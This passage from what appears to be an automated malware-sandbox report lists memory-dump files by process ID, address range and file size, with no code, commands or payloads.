                          • memory/1816-180-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-181-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-182-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-183-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-184-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-1386-0x0000000000400000-0x0000000000405000-memory.dmp
                            Filesize

                            20KB

                          • memory/1816-186-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-187-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-188-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-124-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-136-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-281-0x0000000000400000-0x0000000000405000-memory.dmp
                            Filesize

                            20KB

                          • memory/1816-123-0x000000000040106C-mapping.dmp
                          • memory/1816-138-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-125-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-126-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-127-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-135-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-128-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-134-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-133-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-130-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-132-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-131-0x0000000000400000-0x0000000000405000-memory.dmp
                            Filesize

                            20KB

                          • memory/1864-1118-0x0000000000000000-mapping.dmp
                          • memory/1924-1493-0x0000000000400000-0x0000000000428000-memory.dmp
                            Filesize

                            160KB

                          • memory/1924-1536-0x0000000007320000-0x000000000784C000-memory.dmp
                            Filesize

                            5.2MB

                          • memory/1924-1521-0x00000000054B0000-0x00000000054FB000-memory.dmp
                            Filesize

                            300KB

                          • memory/1924-1535-0x0000000006C20000-0x0000000006DE2000-memory.dmp
                            Filesize

                            1.8MB

                          • memory/1924-1519-0x0000000005630000-0x000000000566E000-memory.dmp
                            Filesize

                            248KB

                          • memory/1924-1514-0x00000000059F0000-0x0000000005FF6000-memory.dmp
                            Filesize

                            6.0MB

                          • memory/1924-1517-0x0000000005450000-0x0000000005462000-memory.dmp
                            Filesize

                            72KB

                          • memory/1924-1534-0x0000000006480000-0x00000000064F6000-memory.dmp
                            Filesize

                            472KB

                          • memory/1924-1515-0x0000000005520000-0x000000000562A000-memory.dmp
                            Filesize

                            1.0MB

                          • memory/2076-461-0x0000000000000000-mapping.dmp
                          • memory/2280-433-0x0000000000000000-mapping.dmp
                          • memory/2372-488-0x0000000000000000-mapping.dmp
                          • memory/2636-1347-0x0000000000400000-0x0000000000418000-memory.dmp
                            Filesize

                            96KB

                          • memory/2636-1303-0x000000000041262E-mapping.dmp
                          • memory/2636-1367-0x000000000A360000-0x000000000A3C6000-memory.dmp
                            Filesize

                            408KB

                          • memory/2636-1371-0x000000000A620000-0x000000000A670000-memory.dmp
                            Filesize

                            320KB

                          • memory/2696-121-0x000000001C760000-0x000000001C8F0000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/2696-120-0x0000000000620000-0x000000000188A000-memory.dmp
                            Filesize

                            18.4MB

                          • memory/3436-1458-0x0000000002F70000-0x0000000003719000-memory.dmp
                            Filesize

                            7.7MB

                          • memory/3436-1457-0x00000000112F0000-0x0000000011464000-memory.dmp
                            Filesize

                            1.5MB

                          • memory/3436-1381-0x0000000000000000-mapping.dmp
                          • memory/3436-1407-0x0000000002F70000-0x0000000003719000-memory.dmp
                            Filesize

                            7.7MB

                          • memory/3436-1448-0x0000000003720000-0x00000000038AB000-memory.dmp
                            Filesize

                            1.5MB

                          • memory/3836-1124-0x0000000002D10000-0x000000000360E000-memory.dmp
                            Filesize

                            9.0MB

                          • memory/3836-1058-0x0000000002D10000-0x000000000360E000-memory.dmp
                            Filesize

                            9.0MB

                          • memory/3836-1092-0x0000000003610000-0x00000000037DC000-memory.dmp
                            Filesize

                            1.8MB

                          • memory/3836-1006-0x0000000000000000-mapping.dmp
                          • memory/3840-1305-0x0000000000000000-mapping.dmp
                          • memory/3932-387-0x0000000000000000-mapping.dmp
                          • memory/4016-1179-0x0000000000000000-mapping.dmp
                          • memory/4160-873-0x0000000000000000-mapping.dmp
                          • memory/4292-1170-0x0000000002FC0000-0x00000000038B7000-memory.dmp
                            Filesize

                            9.0MB

                          • memory/4292-1251-0x000000000F930000-0x000000000FB1F000-memory.dmp
                            Filesize

                            1.9MB

                          • memory/4292-1206-0x00000000038C0000-0x0000000003A89000-memory.dmp
                            Filesize

                            1.8MB

                          • memory/4292-1127-0x0000000000000000-mapping.dmp
                          • memory/4396-1298-0x0000000000000000-mapping.dmp
                          • memory/4460-287-0x0000000000000000-mapping.dmp
                          • memory/4684-1291-0x0000000004CD0000-0x0000000004D6C000-memory.dmp
                            Filesize

                            624KB

                          • memory/4684-1289-0x0000000005130000-0x000000000562E000-memory.dmp
                            Filesize

                            5.0MB

                          • memory/4684-1286-0x0000000000400000-0x000000000042C000-memory.dmp
                            Filesize

                            176KB

                          • memory/4684-1320-0x0000000004C90000-0x0000000004C9A000-memory.dmp
                            Filesize

                            40KB

                          • memory/4684-1306-0x0000000004F10000-0x0000000004FA2000-memory.dmp
                            Filesize

                            584KB

                          • memory/4776-1135-0x0000000000000000-mapping.dmp
                          • memory/4980-201-0x0000000000000000-mapping.dmp